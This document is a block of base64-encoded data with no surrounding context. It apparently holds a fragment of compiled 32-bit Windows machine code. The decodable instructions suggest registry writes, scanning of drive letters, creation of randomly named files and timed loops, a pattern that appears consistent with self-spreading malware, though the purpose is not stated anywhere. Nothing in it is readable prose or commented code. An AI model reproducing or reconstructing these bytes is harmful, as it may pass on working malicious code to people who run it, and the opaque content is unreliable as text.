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 g/gDfQ//dQho7DdJAOhsFgAAWVlqAVhdw/91COjT/f//hcBZdAQzwF3DM8A5RRAPlMBdw1WL 7IHsDAEAAICl9P7//wBTjYX0/v//aAQBAABQagFobQlBAOhP0///WVlQaFICQQBoAgAAgOiu 5P//jYX0/v//UOh5/f//D76F9P7//4qd9v7//1DobhkAAIPEHINl+ACIRf+KRfgEYTpF/3Q8 gKX2/v//AIiF9P7//42F9P7//1D/FczQQACD+AOInfb+//91F/91CI2F9P7//2iuYEAAUOhv 3f//g8QM/0X4g334GnyxM8BbycIEAFZohQlBAP90JBDogRUAAIt0JBBW6GcWAACDxAwzyYXA fguAPDFAdAVBO8h89Ug7yHwEM8Bew41EMQFQ/3QkEOhcFQAAWVlqAVhew1WL7IHsFAIAAIA9 1DJJAABWD4SbAAAAgD3QMUkAAA+EjgAAAIN9EACLdQh0ElboA7b///91DFbo0sD//4PEDGpk aAABAABqGWjUMkkAjY3s/f//6NjJ//9qBGoKjUWcagNQ6L3U//+DxBCNRZyNjez9//9Q6DvO //+DxmSNjez9//9W6OrO//9o0DFJAI2N7P3//+gxzv//jY3s/f//6MTK//+FwHQQjY3s/f// 6FDK//8zwF7Jw/91DOh2FQAAWVCNjez9////dQzo9Mr//42N7P3//4vw6CbK//8zwIX2D5TA 689Vi+yB7BgDAABWi3UIjYXo/P//UFbotv7//1mFwFl1BzPA6boAAACDfRAAdBJW6B61//// dQxW6O2///+DxAxqZGgAAQAAjYXo/P//ahlQjY3s/f//6PHI//9qBGoKjUWcagNQ6NbT//+D xBCNRZyNjez9//9Q6FTN//+NRmSNjez9//9Q6APO//9WjY3s/f//6E7N//+Njez9///o4cn/ /4XAdBCNjez9///obcn//+lr/////3UM6JMUAABZUI2N7P3///91DOgRyv//jY3s/f//i/Do Q8n//zPAhfYPlMBeycNVi+yB7AAIAACApQD4//8AgKUA/P//AI2FAPj//1D/dQjoxv3//42F APz//1D/dQzot/3//42FAPz//1CNhQD4//9Q6ARlAACDxBj32BvAQMnDg+wQVVZXg0wkGP+9 ABAAAGoBVb7U8EAA/3QkKDP/iXwkIFbops///4PEEIXAD4XvAAAAV1boTtD//1k7x1mJRCQQ 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 
